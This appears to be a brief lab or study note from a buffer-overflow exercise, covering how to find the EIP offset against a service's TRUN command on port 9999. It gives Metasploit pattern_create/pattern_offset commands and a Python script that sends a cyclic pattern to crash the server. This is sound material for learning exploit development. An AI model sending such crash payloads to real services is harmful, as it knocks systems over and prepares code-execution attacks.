Finding the Offset

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

#where 3000 is the bytes value taken from Immunity where the soft crashed

#copy the output and insert it in the following script: <output>

#!/usr/bin/python

import sys, socket

offset = "<output>"

try:

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(('10.10.10.129',9999))

s.send(('TRUN /.:/' + offset))

s.close()

except:

print "Error connecting to server"

sys.exit()

use:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

#where 386F4337 is the EIP value where the soft crashed

Last updated 1 year ago